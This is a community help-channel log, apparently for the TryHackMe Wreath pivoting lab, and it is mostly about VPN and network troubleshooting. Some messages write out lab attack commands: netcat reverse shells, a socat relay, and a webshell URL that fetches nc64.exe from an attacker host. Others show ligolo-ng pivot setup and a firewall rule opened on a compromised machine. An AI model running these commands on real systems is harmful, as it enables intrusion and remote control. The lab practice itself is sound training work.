do like user Rapsberry Rat suggested above: #wreath-network message
if you want the full story of their experience, start with this message: #site-support message
I am pretty confident you will be able to downlod the VPN config file if you repeat the procedure multiple times

I am a subscriber

Additionally I tried to use the attack
Box and that didn’t work either.

even for the AttackBox, as there is currently a problem, you have to download the VPN config file
what is your network instance for Wreath? And is it in the state of Running?

On the attack box the txt file said that configs were already set. Also yes, the network status was running. I even voted to reset it and still couldn’t get the network to respond to nmap scans

I know that the network config should be ready, but like I said there is currently a problem, whereby you have to download the VPN config file for THM AttackBox as well and run it with openvpn
proof of that problem: if you do ip link (orip a , does not matter), you should have tun0 listed, but it is missing (check my screenshot: I have just started an instance of THM AttaackBox)

Gotcha. When I attempted to download the config file I received the 500 error

you said earlier you did leave/join, with no sucess
you have to repeat that multiple times (I know it is a pain)
apparently, it helps if you leave minutes (possibly 15) between the leave and the join
how many times have you done that leave/join so far?
for user Raspberry Rat, it took them 4 times (check here: #wreath-network message)

I did it about 6 or 7 times

I suggest:

• you leave more time between leave and join
• make sure the new VPN config file is different from the previous one For instance, check that the MD5 hashes for the two files are different (command for that is md5sum <file_name>)
• pay attention if you join the same instance as mine: 10.200.85.X, it works for me right now (check screenshot), hence I expect it should work for you too
• preferably, use THM AttackBox at the beginning; once it works, move to your own local VM if you like it better so
  Please provide feedback, in particular if it works, as that would provide confidence the leave/join procedure indeed works

Thanks so much! When I was attempting it yesterday I was on the 10.200.85.X network. I’ll let you know in a bit

I forgot to ask about the 500 error: do you get it when you download after joining or only after regenerating?

Regenerating and just downloading

thank you @cerulean prawn
it work, successfully download VPN file

Gave +1 Rep to @cerulean prawn (current: #19 - 492)

Currently on task 33 and trying to import the port scanning script into memory but failed, i am sure the directory exist. Anyone has the same problem before?

nvm, i saw my mistake🤣 i thought i should load the script directly into the flag s

Hi all, anyone else get Git Lab login for task 17 on wreath network?

My redirect sends me here...

I mean, I'll tell you right now there ain't a Gitlab instance in that network lmao.
What's your output of ip r

I'd also be a little surprised if they were using 10.200.0.0/24 for this one, although the available subnets may have changed

are you asking for my pivot point or my own IP?

I'll give it all if you would like 🙂

Run ip r in your terminal and see what you get?

this is my Kali instance

Where are you getting 10.200.0.150 from?

first pivot on prod

Yeah, uh, maybe don't use the DNS config to identify the subnet

I know, but it was the easiest screenshot to show you, unless you want me to show the ping sweep results. 😦

Have a look at the routing on that box

And ping sweeping should come later -- you won't get very far ping sweeping the wrong subnet

Or scanning generally

Not sure what's actually meant to be on 10.200.0.150. Guessing just a regular THM instance.

ok, I will just leave the room and follow a different network then. I have been following the instructions from the room to learn pivoting and this is the subnet that I found.

Did, uh, it tell you to look at resolv.conf for your next hop?

It did not. Phew, thought 20 year old me might have been a bigger idiot of a teacher than I thought

no worries, maybe tomorrow I will finally get a different instance. been working on this for 10 days at this point 😦 I am just very upset. It says to use nmap and gives examples based off of the room. these are the IPs I get back from. My notes are horrific (which is why I am trying to learn from this room) and I am just getting super emotional and cant think straight.

Ive gone up tp Task 12 twice I am just so lost right now.

It's all good 🙂
Have a look at ip route on the compromised server

That'll show you the routing configuration for that box, including the local subnet

yes, 10.201.134.0/24

There you go

Scan that subnet

ok, now I have 3 ips, just go from there?

I'd say so, yep

thank you

thank you.

Gave +1 Rep to @merry robin (current: #10 - 822)

Np 🙂

I could use a little help with getting the exploit working for the gitlab server. I've tried both curl and burp with no luck. I uploaded a standalone netcat onto the server and I know my port and listener are good, because I can revshell back to my machine. Both burp and curl time out with no response. I've noticed if I leave upgrade-insecure-request on in burp, I get TLS connection errors but I can get responses from a=whoami, a=hostname etc just fine. Can I please get some tips on what I'm doing wrong here?

Edit: In case someone is searching similar later, specifying task 20 and ip .150

I've tried restarting my machine, restarting the server, different ports, and even a different powershell rev shell. Still no luck

I can run ping on the gitserver but it doesn't seem like it can hit the prod server.

even more interesting, I can't ping git from prod either even though I'm connected through prod and can get git to send back hostname, whoami, etc

it is in the arp table though

works from git too

I can set up a webpage to download nc.exe on prod, but seems like git can't download from it. validated I can hit the web page from my machine.

Either the box is messed up or I'm missing something simple and probably obvious at this point.

¯_(ツ)_/¯

you could try the reset the network option but doing so you gotta "start from scratch"

yeah, i've done that a couple times now. Even swapped my VM out just to be sure. I'm half posting here cuz it helps me think to 'say' it and my SO probably doesn't want to hear me ramble anymore lol

heck, even socat port forward doesn't work. Tried the original exploit after setting up "./socat tcp-l:16000 tcp:<MY ATTACK BOX IP>:16000 &" with no success. but running "nc 127.0.0.1 16000 -e /bin/bash" from prod connects. I'm leaning towards a network issue but confused how I can reach git server in the first place since I'm using a shuttle tunnel through prod to hit it. I think it's time for a break.

how come you have a gitlab server on your Wreath instance?
check this message from Muiri, who is the creator of this network: #wreath-network message
maybe reading messages below from that one will clear some confusion

.150 has a hostname of git-serv

for the CI/CD network yes, for the Wreath network no

Where I say git server, Im referring to where I'm hitting 10.201.134.150

have you read the follow-up messages from Muiri?

I skimmed but I'm afk right now. I'll give it a more thorough read through when I get back to my computer. Thanks for linking it 🙂

Gave +1 Rep to @cerulean prawn (current: #16 - 549)

I don't think that's it. looks like Witty's problem was that they weren't using 10.201.134.0/24. I'm not hitting an actual git server. I was just referring to the box by name. I'm using the exploit suggested, the php file is being uploaded, and I can run some commands. Im just not getting a response on my listener when I try to get a rev shell. It's like .200 and .150 can't actually talk to eachother even though the only reason I can hit .150 is because I've got a sshuttle tunnel through .200

I reran the arp table check here on .150 and confirmed .200 was still listed. pings all time out when ran through the exploit.php. I can still get local info like what's in directories, user info, etc. I'd blame my tunnel, but if that were the issue then I don't think I'd be able to reach 150 at all and I know I opened the firewall port for my listener since I can reach things on that port from my attack machine.

Is there a reason why the git-server(.150) can scan the port of the wreath-pc(.100) while using static nmap binary on prod-server(.200) fail to scan the wreath-pc(.100)?

Try starting something like a webserver on prod-srv and see if you can hit it using certutil.exe or powershell.exe iwr. If not then it'll be a network issue. You're in one of the "new" subnets (10.201), which I know have been... problematic

Because that's how the "firewall" (security groups) are configured.

Pretty sure it's network then. I was trying to use powershell to download nc.exe into administrator's download folders and it was failing. Confirmed I could hit my web page on .200 from my attack box. Oh well, I'll just poke at it once in a while till it works lol. Thanks, I appreciate the follow up!

Gave +1 Rep to @merry robin (current: #10 - 826)

not getting anything in network vpn server (Acess>network tab) no wreath nor holo

getting this

me neither

I have wreath under network vpn server.

ah! wreath is there for me now

did you Join Room for wreath or holo? don't know if that has anything to do with it.

yes i already joined the room

nice but only for you lol

any idea whom do i contact for this stuff?

I joined the room, started it, and reset when it was 4/5

let me double check it

also note the pinned message in this discord channel by @cyan vine

#wreath-network message

@unborn shell are you able to use the AttackBox with it?

just curious if that works

it says network status : stopped for me idk why

attempting to start (give this popup: Uh-no! Failed to start the network.)

might be worth asking in #room-help or #room-bugs

refresh the page, and press start again
if that fails too, use the Options button to leave the room, and then join again: you will be assigned to a different network instance (i. e. third octet of IP addresses will be different), with the netwokr in the state Running right away

yeah you have to leave and rejoin the room Wreath until you find a non broken room that allows you to start the network AND download the vpn configuration file

hi all, I was hoping someone may be able to point me in the right direction ref Wreath. Currently on task 20. trying to ping my device (ACK). set up sshuttle through the comp (COMP) device and can see the next device in the network (TARGET) and used the relevant exploit. I have opened up a port on the firewall but no ping seems to come through the tunnel to ACK. I can ping COMP. Am I missing something obvious?

Man

I can't download config file for wreath network giving me 500 error

why the hell am i failing to join this room its not even letting me join???

Do you have a streak of > 7?

No

could that be the problem ??

Yes.

Free users need a steak of > 7 to access som enetwork rooms.

Oooh ok thanks.

Gave +1 Rep to @sharp ice (current: #1 - 3344)

No worries, this shows in some places, but not in others.

using netcat on pivoted system(1) throws of glibc error any alternative ways ?(socat isnt working either)

Use statically compiled versions.

@sharp ice i have the 7 days streak but I'm unable to download the configuration file for wreath network when i click the download button it's giving me 500 error

check this: #site-support message

wait for few mins after starting the network (wait for 5 mins or so it worked for me)

Followed the walkthrough and darksec video still not getting the reverse shell of 2nd machine in the network

thank

I do apologise if this is the wrong place to ask but I am trying to access thomas' website and I have already mapped the IP address to the domain in my /etc/hosts file, but it keeps on timing out. I have tried to ping the site and I have gotten 100% packet loss.

(Do forgive me it's been a while since I have been here.)

I have regenerated a new OVPN file as well so it's a new connection as well and should be resolving to the correct server.

In essence the connection keeps timing out.

use the Options button and press Leave, and then pressJoin a few minutes later: you will be assigned to a different network instance
try the pinging
if that fails regenerate the VPN file, and wait a few minutes to donwload the new config and have another go
if the above fails, repeat the process

did it solved by following the below steps? coz i am stuck on the same point

I haven't had a chance to try this out but I will in a moment

Thanks for sharing this with me, I'll give this a shot and report back

Gave +1 Rep to @cerulean prawn (current: #16 - 571)

Unfortunately I got this when I followed the same problem. Should I escalate this with the team?

I had pinged the front facing machine in the Lateral Movement and Pivoting network.

just checking the obvious:

• the Wreath network is in the state of Running, right?
• you have run the VPN specific for the Wreath network , right?

Not everything responds to pings.
Can't remember if I blocked that for the web server.

have you done the procedure to leave and join back multiple times?
currently, I have the network instance for 85 (third octet) as per screenshot
maybe you can repeat the leave/join more times hoping to land on that 85 instance that works for me (I know, this is frustrating)
referring to the previous message by Muiri, the screenshot also confirms the prod_serv machine responds to ping

I am connected to the Wreath network via OVPN file for said connection.
I'll have review this when I have bit more time. Unfortunately, it's really late in Aus right now and I am just glad I am not connecting via email lol 😅

I have tried doing this as well, but I'll keep going to see what I can do

between leaving and joining, allow enough time: I would say minutes, possibly 15 (several users report different timing)
also, when regenerating VPN config files, allow 1-2 minutes before downloading; also, check the new VPN file is different from the previous one (you can simply do that by comparing their MD5 hashes)
a few comments by Muiri in Discord seem to indicate access to Wreath, is at times ... special 🙃

In fairness, it always used to be fine. The underlying infrastructure seems to be... broken... though

getting this when trying to connect to the third system (using chisel and foxyproxy)
Tried
:using multiple different ports

It's a shame to be honest but it would be a good way for people who are planning to prep for the OSCP to cut their teeth a multi-machine environment.

yo guys

I'm unable to download my wreath network openvpn file

says everytime 'unknown error occured'

I got the same trouble. A week ago everything went right.

i completed it yesterday😂 lemme know if u need assistance or something

Myebe you can tell me whether you had access to .100 machine. Yesterday, I couldn't.

Can anyone tell me why I cannot access http://10.200.84.100 after running chisel server and client and having configured Foxyproxy?

is it saying connection reset? (have u selected socks 5 on foxy proxy)

yes i did

after joining room and starting network wait for atleast 5 mins then try downloading it might work

Alright, will try that

NO way

Good day here

I am not able to connect to wreath network, each time I want to download it keeps giving me an error message. Is it just me or there is something with it

i am not able to download the vpn file

worked?

question

answer

okay thank you, I will try that now

I did that before tho, it did not work

i did it now and it's still the sme

it is not working

u waited for 5-10 mins ? after joining the wreath room

Can anyone help me? I'm having trouble downloading the Wreath Network OpenVPN file because it shows "An unknown error occurred."

u waited for 5-10 mins ? after joining the wreath room(try this worked for me )

Hey, I am doing the wreath room. For that I am using my own Kali VM (latest version). I could succesfully connect to the corresponding VPN.
So I compromised the first machine but I am loosing the connection to it all the time. It just freezes for 5 - 10 minutes (due to spoiler alarm I will not tell what kind of connection i have). The corresponding IP address does not even resonds on pings in this time range. It seams that the connection freezes alway when hiting enter or tab for autocompetion. But I am not sure whether this is all the time the case. Its just a observation. Does anybody have the same issue? Thx

Hi guys! I have been able to compromise the first two machine i.e. webserver and gitserv. Transported the chisel script into gitserv , connected to my kali by forking through webserver using socat (binary, planted in binary). I was able to run nmap using proxychains4 to enumerate the last machine and found some open ports. But that was three weeks ago. When I started with it today, I can use chisel, socat, proxychains4 on the last pc (.100) but all the ports are responding closed. Even a reset of the network did not work. Can anyone help??

I am having trouble connecting to the vpn. it is timing out. any ideas?

It is happening for me as well. None of the network's VPN getting connected. Did you figure out solution? BTW I am on M2 Macbook

I had a question about the wreath box in the conduct it says the part about not messing with the box for other people is this still relevant for every use of the box even solo also could i be doing the same wreath box with someone?

yeah I am on m2 as well. still can't connect it's sad

The regular vpn works, just not this one.

I got this to work on a Kali VM on M2. Just cant run on base M2

True

oh really man. what do you use to run kali?

VMware Fusion

https://mac.getutm.app apparently this one is also good.

@merry robin please can you give some advice. I want to work on this room.

bro i got it to work if you need i can let you know how

Yes please?

so apparently they use a bad cipher, i checked the openvpn logs. By default openvpn newer versions don't accept it.

go to settings -> scroll down to advanced settings -> security level change it to insecure (-_-)

LOL. It worked

Thanks man

❤️

@merry robin would like to hear your thoughts on this. can you update the cipher algorithm on the vpn server side. Why do we have to use insecure settings to connect?

no problem man!

Lmk if you can access wreath network, as for me the IP isnt responding

looks like no 😦 on kali it is fine?

Yes

screw it bro, it's not working i'm gonna do some other room. i was really looking forward to it, but whatever

That is not something I have (or have ever had) any control over unfortunately. TryHackMe manages the underlying infrastructure -- I just built the content.
I use the present tense "manages" in the loosest possible sense. By the looks of things you've already found out why...

thanks for the reply man. Understood.

Gave +1 Rep to @merry robin (current: #10 - 856)

the room is great by the way I can't wait to work on it one day, you did a great job!

who would be a good person to contact about this? i can't get it to work on my mac and other users say the same thing.

is anybody able to access the first machine (prod_server) ?

Has anyone used ligolo-ng on this room? I am able to get the agent onto the prod machine and connect back to my proxy. But if I run ip route add x.x.x.0/24 dev ligolo it immediately disconnects the agent and I'm unable to even reach the prod machine.

There should be an easy fix for that.
First: tell me, why does it happen? Why does the connection drop?
If you can work that part out then the solution should be straightforward 🙂

Been scratching my head on that. One guess would be something to do with the fact I already have an ip route for that subnet via x.x.86.1 over tun0 which is why I can reach "prod" to begin with so maybe the connection drops because of a conflicting (or incorrect) change in routing? But I can't reach the other two and there are no other interfaces. /24 covers all 0-255 so not sure why I wouldn't be able to. I can clearly reach them from "prod" via an nmap -sn but that doesn't happen from my kali. I've used Ligolo several times on other boxes and to double proxy so I think it isn't my ability to use the tool but rather the networking that is tripping me up. Any help is appreciated! 😄

I was able to figure out! Shouldn't include what I'm trying to route through 😉 By using direct routing I was able to get it to work but I know I could have also just excluded it by adding a direct route via <gateway>. Thanks @merry robin for tipping me in the right direction.

Gave +1 Rep to @merry robin (current: #10 - 861)

That's exactly it -- well done! 😁

why is Wreath 45min this room is long af lol

Good point. I've changed it to 180.

Help me to setup my own kali vm

The vpn config file is not downloading

I tried re generating it

There seems to be a network connectivity issue by connecting both methods OpenVPN and Attackbox.

Really like the wreath room and Ive been practicing it for the last few weeks and everything has been working great!
UNTIL...suddenly it stopped working correctly a few days ago.
before posting this i did a good bit of trouble shooting and searching through the discord.
Also had the room reset twice by vote and it still has the same problem.
Here is what its doing...It works for about 30secs to a min and then stops.
I can do everything normally like ping, get a shell, connect to the webpage, or run exploits...but only for about 30 seconds
Then it stops responding again for a few minutes and will come back online for another 30 seconds, etc, etc
The directories and files i created are still on the box.
Sshuttle connects and the webpage down stream can still be reached...but it crashes again and again
@royal stump Tagging you because Im not on here often and dont know who the mods are or anything.
but i see you're pretty active so i figured you might know someone can help.
Thanks

Gave +1 Rep to @royal stump (current: #1 - 4469)

Try to re-generate vpn file

wow...i assumed because i was able to connect to the machine that vpn wasnt the problem.
But i regenerated as you suggested and it appears to be working again.
Learning lesson, Thanks!

Having trouble reaching the initial IP, I have tried to regen my ovpn config, I can't ping or nmap scan - It was working fine until I ran Nessus against it. Could this have borked it?

I can't really help with this, but I can confirm that I've seen previous reports of people having the exact same problem after running nessus on the target.

No worries! At least I know what the problem might be now 😆

Is there anyway to get it reset without the 5 votes?

Not that I know of.

I'll vote for a reset, but IDK if we're on the same lab.

ty!

Ah fixed it nvm

I'm trying to download the openVPN config, but it gets stuck on "Downloading file", and after 3 minutes or so this error pops up and nothing downloads.

I've tried regenerating the file multiple times

It seems to be a backend 504 gateway timeout

this has happened to me just now

did you find a fix?

Are you from the EU region?

yessir

ive found the fix - just wait and pray

``C:\xampp\htdocs\resources\uploads>net use \10.50.66.214\share /USER:user "s3cureP@ssword"
net use \10.50.66.214\share /USER:user "s3cureP@ssword"
System error 6 has occurred.

The handle is invalid.

C:\xampp\htdocs\resources\uploads>
``

im having some trouble with this

its a smb share which wont seem to connect to the windows machine

This helped me:
Please try the following:
​
Go to the Network room
In the top right corner, press "options" -> "leave room"
Wait for 30 minutes
Re-join the room
Once you have rejoined the network, make sure to regenerate your new configuration file by heading to https://tryhackme.com/access, selecting the network from the drop-down, and finally clicking "regenerate"
​
Ensure to wait up to 2 minutes before downloading your OpenVPN file!

for fixing the vpn

didn't do it yet
you sure you have access to it?

i just used http instead

ive had issues with impacket smb shares in the past

not enough documentation online

http for shares?

its only using smb for data transferral

so you can just use http instead

oh yeah easy

is Sshuttle still works only on Linux targets?

.

Wreath OVPN file not downloading

Was able to download LateralMovement, and BreachingAD no issues
Tried Regenerate and still no luck
Reviewed the web request/ responses and only difference I saw was the ID ( 605a05f41789b962daf23e45 v. 62b779a82244211aa2c53453 ) and how the name of the OVPN file is appended to the username/account
Could it be an issue with CloudFlare hosting this specific file?

Tried on and off from my VPN
Tried via Kali VM
Tried via THM .ovpn in Kali

same

Quite old, but worked.

Leave room join again wait for 5-10 mins then try downloading the ovpn file

^ Try this @junior yacht

I can't join the room either. I tried leaving for 30 minutes, then tried regenerating & downloading, but I can't download the vpn for the Wreath network. any alternatives?

**Problem: **Been trying to use Ligolo-NG for this Wreath room and am now stuck on Task 34 to double-pivot to the .100 machine from admin user on .150 machine.

• I also don't understand the network configuration of why .100, .150, and .200 cannot already communicate if they are all on 10.200.81.0/24 subnet.
• Any insights or assistance is appreciated.

CMD (from Kali): listener_add --addr 0.0.0.0:7777 --to 127.0.0.1:7777 --tcp
CMD (from .150): netsh advfirewall firewall add rule name="Ligolo-r404" dir=in action=allow protocol=tcp localport=7777
CMD (from .150): .\ligolo-ng_agent_0.7.5_windows_amd64.exe -connect 10.200.81.200:7777 -ignore-cert```
Resulting Error Message:
```time="2025-06-01T19:09:33+01:00" level=error msg="Connection error: dial tcp [my-kali-ip]:7777: connectex: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond."time="2025-06-01T19:09:33+01:00" level=fatal msg="dial tcp [my-kali-ip]:7777: connectex: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond."```


--SOLVED--
- Needed to use the same port I was using on initial pivot through .200

I am facing this problem whenever i try to run nc on the compromised machine to get back a reverse shell , i am getting this error : ./nc: /lib64/libc.so.6: version GLIBC_2.34' not found (required by ./nc). How can i solve it so that i am able to run this command and beable to get back shell when i run the powershell command on burp ?

That's not a statically linked version of netcat

Well solved!
To answer your other question (r/ why they can't all communicate):
The original network design called for three subnets

1. DMZ (public webserver)
2. Services (Git)
3. User estate (PC).

That wasn't possible with the way THM networks are setup, so we spoofed it using one subnet and security groups.

So from a technical standpoint, the reason why they can't communicate is that there's a distributed firewall in the way.

From a storyline perspective it would have made more sense for them to be on different subnets

can you help me with the sshuttle, it's troubling me

So if I'm trying to pivot using Portforward, how should I do it?

In the Description:
"Access the website in your web browser (using FoxyProxy if you used the recommended forward proxy, or directly if you used a port forward)."

I'm trying through .200, but as you mentioned, they can NOT communicate. So what's the method with Portforward?

?

@young geyser hie 😊

hello people

i'm having trouble connecting the git-serv with the starkiller,........ task 27 , anyone

As i remember you need to connect to the first linux machine and create a tunnel that will give you access to the git machine, did you done that?

yes i did all that,.............

Hi all, please note that this network has now been converted to v2. V2 is THM's new network infrastructure that has improved stability and ensures that all users receive the same subnet.

If you refresh the page, you will be taken to a new network page and you may have to boot a new instance. Please make sure that you use the wreathv2 VPN profile when using the network. You can also use the tryconnectme script on the attackbox to debug your network connection

woo thanks very much i was having trouble with it , thanks

Gave +1 Rep to @soft loom (current: #31 - 316)

Please let us know how it is working for you now. 🙏

Just click your profile>access>left side networks n click the dropdown menu, click wreathv2 , regenerate, download config and connect

Awesome! 🥳

kkk they even introduced a new feature kkk the other tasks are locked now

Yeah, I see that is enabled now. It forces to do the tasks in order. Let me turn that off for the time being.

now that i'm connected, i can't get this http-hop listener to work 🥺

on powershell empire to connect to the .150 server

oi people, i've set up a chisel forward proxyand i need to access the web of .100 ,...................how do i set up foxy proxy

thx for this information, vpn works fine.
Are there problems in displaying the network status? I get a blank screen and no targets information is displayed (above the start/extend/reset/network uptime: 18min bar).

Gave +1 Rep to @soft loom (current: #31 - 320)

Can you send a screenshot here? Targets should show once you start answering questions in the room and have the network started

Mmm, and you say your VPN profile works? Can you send DM me the Remote IP in your VPN profile please? I will investigate what is happening there

It's showing me join the room I have click that button multiple times but still same issue

try to ping 10.200.180.200

or look on your vpn's ip address use the third octect on your vpn's ip adress and ping this ip 10.200.x.200

thx 👍 vpn was working and the problem that the targets were not shown is fixed now as well

Gave +1 Rep to @trail jungle (current: #2997 - 1)

Hie people

Hey is it just me or is the option to download the wreath network VPN just gone now?

Hi all, please note that we are aware of an issue with network infrastructure for wreath. We will be deploying a patch soon that will bring the wreath networks back online.

is wreath online again???

Don't think so. Still not working for me either. Been trying it for the last few days, still nada.

I was able to connect using the connection file called wreathv2

check on access via OpenVPN on networks tab there should be werathv2

Nice! I downloaded a new vpn file yesterday and it didnt work. but i generated a new one again just now and its working.

It’s very unstable—only works randomly at times. I spent two days thinking the issue was on my machine before reading this.

Can you be a bit more specific on what issue you are facing?

The patch was deployed like 30 minutes after I sent that message, so would not affect you now.

I also havent been able to replicate stability issues from users.

The most common mistakes I see that affects stability:

• Using ping to test access. Do not assume ICMP traffic is allowed
• Running multiple VPN profiles at the same time. Often unintentional, but your previous run didn't actually exit, so now you have multiple VPNs running, consistently de-authing you. Use ps aux | grep openvpn and you should see a single line. If you see multiple, you are running it multiple.
• Consistent switching between your VM and attackbox for the reason mentioned above, they use the same VPN profile
• Losing a shell cause of a command running. Often when you try to run an interactive command in a non-interactive shell it kills it.

Some things to consider:

• Look at the output from running the VPN profile. If every 2 minutes it reauths, it means you are running multiple VPN profiles.
• You can ping the VPN server, since this server accepts it, which ends with .250
• if you home/work internet is unstable, your VPN will be unstable as well. Rather use the Attackbox then, which is hosted in AWS meaning your Web view will be unstable, but not the network connection itself.

If any of the above problems, a good measure is to regen the VPN profile, which will automatically deauth all running instances. And on the AttackBox, you can run tryconnectme from terminal, which will Debug your network connection

wreath is down for me 1 hour ago also

Hmm I was trying tunneling with ligolo and then crashed...

Check your ligolo config. It alters your network settings and if you are doing the routes wrong, you overwrite the VPN routes and it will go down for you

Oh I will check that today

hie guy's ,..... i managed to connect somehow and i'm trying to set up a reverse shell in task 41 but , after following everything , the shell can't spawn for some reason ???? i don't know why any clues

Ok so it looks like only prod-serv on wreath is active... The other machines shows as shut down even on the diagram. Please fix...

Hey, I'm almost done the network, but am stuck on getting a reverse shell for task 41.
My setup
I have set up a python server on port 80 (I tried 8080 too just in case) with a nc64.exe in the same directory.
I am using ligolo to set up a double pivot, but as everything else is working I'm not sure why this isn't.

The problem
In my browser I hit http://10.200.180.100/resources/uploads/shell-kalaimaranb25.jpeg.php?wreath=curl%20http://10.250.180.6:8080/nc64.exe%20-o%20c:\\windows\\temp\\nc-kalaimaranb25exe
The issue is that I see no output on my server and the file is not being uploaded. I thought it might be a connectivity issue, so I ran sudo tcpdump -i any port 80 -v to check if I was getting anything. And to my surprise, I did. I saw the http request come through. I pasted the whole output into gemini and apparently the windows machine is sending a Reset flag closing the connection.

Another thing to note is that when I try to run curl.exe (like certutil.exe), I get no output. Maybe curl isn't working? I'm really not sure what more I can do at this point. Could it be a network issue or am I doing something wrong here? Any help would be appreciated here 🙏

Well... I figured it out. It was because I was using ligolo-ng. There's some custom set-up that had to be done. For anyone else using ligolo, look at this site: https://www.stationx.net/how-to-use-ligolo-ng/. It's really helpful for debugging and has instructions for basically all the tasks in this network

Thanks, currently, the main issue I am facing is intermittent TLS handshake failures causing the VPN connection to drop and restart repeatedly. I have verified that only one OpenVPN process is running, so multiple simultaneous VPN instances are not the cause.

My home network is stable, and my firewall allows UDP port 1194 and ICMP traffic. However, I have not tested from a different network yet.
I appreciate the suggestion to regenerate the VPN profile; I have done this multiple times and switched regions, but the issue persists.
It may be related to my VM environment. I would highly appreciate any guidance or approaches to diagnose the connection issue.

For testing connectivity, I primarily use nmap scans instead of ping. Typical nmap output shows:
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in X seconds

Summary of relevant log entries:
Started OpenVPN: US-West.ovpn
TLS connection initiated with 54.193.240.194:1194
Peer verified, CN=server
Assigned IP: 10.2.54.205
Routes added: 10.10.0.0/16, 10.101.0.0/16, 10.103.0.0/16
TUN device: tun0, cipher: AES-256-CBC, auth: SHA512

[14:16:08] Inactivity timeout (--ping-restart), restarting
[14:17:09] TLS handshake failed (timeout)
[14:20:31] TLS handshake failed (timeout)
[14:21:32] TLS handshake failed (timeout)
[14:22:33] TLS handshake failed (timeout)

The VPN connection failed due to a TLS key negotiation timeout, triggering a soft restart. The client successfully reconnected to the VPN server at 54.193.240.194:1194 and reinitiated a TLS handshake. Certificate verification, key usage, and extended key usage checks all passed during the reconnection.

Thanks for the detailed feedback, appreciate it!

Just some more questions:

I have done this multiple times and switched regions, but the issue persists. - The VPN profile we generate here is not region specific. Just headsup. For networks, it boots a completely new VPN server, which is why you have the separate OVPN file. Just checking, but:

• Which region are you?
• You are not running the THM VPN AND the Network VPN at the same time right? Cause I see this: Started OpenVPN: US-West.ovpn which isn't the OVPN of the network? The network OVPN would be wreath2.ovpn

Gave +1 Rep to @alpine cradle (current: #3056 - 1)

hey, is this network still working fine? wanna start it tomorrow morning and practice pivoting for the eJPTv2

I was able to do the whole thing. If smt crashes real bad reset the network, but I think its good

Hey everybody !

I'm currently at the beginning of the Wreath network room and i connected to the network from my kali vm using the network VPN configuration file.
The material mentions the ip of the server that is the entrypoint for the attack is at the top of the page in the network panel, but the nor the network nor host parts of that ip correspond to the network i'm on or the machines that i can see in it with an nmap scan.I just wanted to check in with you guys and make sure I wouldn't be running attacks against the wrong target or worse - as i understand this room is a shared network with other THM users - against other users machines. Have i got something configured wrong or is there an issue somewhere else ?

Hello everyone

I’m trying to solve wreath room in tryhackme but it seems that after i started the machine no Running status is shown on the top left of my screen and i don’t know why.
Notice that i’m connected to the wreath vpn

Anyone can help with that ?

The wreath first machine has no ping. I almost changed anything. Recreated the VPN the VPN is working and the website says I am connected to the VPN but. I have no ping from the first machine.

are you using the version 2 for the VPN?

Wait I will control

Version 2.6.14

OpenVPN

2.6.14

Should I downgrade?

sorry, misunderstanding, I am referring to the VPN file you download from your access page on THM
check this previous message: #room-help message
there was a time where 2 different version of VPN files were available for Wreath, but this may have changed in the meantime

There is only one version of VPN for me and it is not working.

The last time that I done it was 2 VPN

I suggest you use the Options button to leave the roon, then join again
on your access page, regenerate the VPN file, download and re-run openvpn

I did this too even resetting the progress.

I have all answers from my own notes. But I will redo it for training reasons.

can you share the output of your openvpn command
here is mine so we can compare
here is also my network topology
from the third screenshot, you can see I can ping the IP of prod-serv

Wreath VPN

I am not on the same network with that machine

comparing your output to mine:

• my output

2025-09-05 08:15:03 TCP/UDP: Preserving recently used remote address: [AF_INET]34.252.51.34:1194
2025-09-05 08:15:03 Socket Buffers: R=[212992->212992] S=[212992->212992]
2025-09-05 08:15:03 UDPv4 link local: (not bound)
2025-09-05 08:15:03 UDPv4 link remote: [AF_INET]34.252.51.34:1194

• in your output, the IP address is 52.49.253.40 , and that corresponds to the IP of the previous version of Wreath (the one before version 2)
  can you double check that there is no wreathv2 listed in your access page as per screenshot? make sure you scroll to the bottom of the drop-down list

I have no V2

It doesn't show up for me

leave the network again, allow for 5-10 minutes before joining again
If, after joining again, you are assigned the same network topology/same IPs, you did not wait long enough
to be on the safe side, delete browser cache and do hard refresh (Ctrl-F5)
regenerate VPN file, then download
hopefully a v2 has appeared for Wreath

I will do it.

I am now log out from THM and I reset the progress and leave the Wreath room.

I'll check on the outcome when I am back later 🙃

not woking unfortantly 🙁

you landed on the same network instance?

I down have that Wreathv2

it dosent show up

Maybe I should contact the support

no v2, understood, and then when you run openvpn, and get "Initialization Sequrence Completed" you have a tun0 interface, right?

yes

but I am not on the same network

does not matter, routing is handled on THM infrastructure

can you ping the IP of the prod-serv?

No ping

now it is comming

I have now the seccound vpn file

It show up on the website

thanks

Why this is happened ?

this is intresting

dunno, but sometimes being stubborn helps 🙃

thanks alot

Gave +1 Rep to @cerulean prawn (current: #13 - 762)

hello

i dont have connectivity between my pc and wreath i have connected with the vpn file but i cant ping to the wreath network

check the troubleshooting earlier today with Morteza, that started here: #wreath-network message

Hello , the openvpn file is active [2025-09-09 01:13:21 net_iface_up: set tun0 up]
but the pings arent working?
and yes im using [-wreath.ovpn]

[-wreathv2.ovpn] worked

kex

good evening!

I've been trying to join Wreath network room but the button to join doesn't work. Does someone know how to fix it?

unless you are a subscriber, you need a 7-day streak before you can join Wreath

how did you get v2?

nvm, I found it 🙂

hey guys

the Wreath network seems not to have a ping and also I need -Pn to scan it with nmap, also I need nmap to guess the OS the server is running but my scans come back with no OS, it also says too many fingerprints to guess for an OS, I have tried -O, -A, none of them work, visiting the IP also does not redirect me to thomaswreath.thm

also, I left the room reset the progress joined again but now, there is no wreathv2 and only wreath in the access page in the networks section.

Oh, guys, for anyone with the same problem:

1. reset the progress
2. leave room
3. wait 4 - 6 minutes
4. join again
5. wait 6 - 7 minutes
6. go to access page -> networks -> select wreath v2
7. hit regenerate
8. download and connect to vpn
9. ping the ip you've been given in THM
10. if ping works, then youre golden, if not, do all of that again 1 through 10.

my .150 host isn't pinging even for the prodserver. what i have to do?

.

Hey Guys, on the empire installlation I am supposed to run:
sudo powershell-empire server and am supposed to get an output like:

[INFO]: Submodules auto update enabled. Loading. 
[INFO]: No .git directory found. Skipping submodule fetch. 
[INFO]: Checking submodules... 
[INFO]: No .git directory found. Skipping submodule check. 
[INFO]: Using mysql database. 
[INFO]: Empire starting up... 
[INFO]: v2: Loading listener templates from: /usr/share/powershell-empire/empire/server/listeners 
[INFO]: v2: Loading stager templates from: /usr/share/powershell-empire/empire/server/stagers 
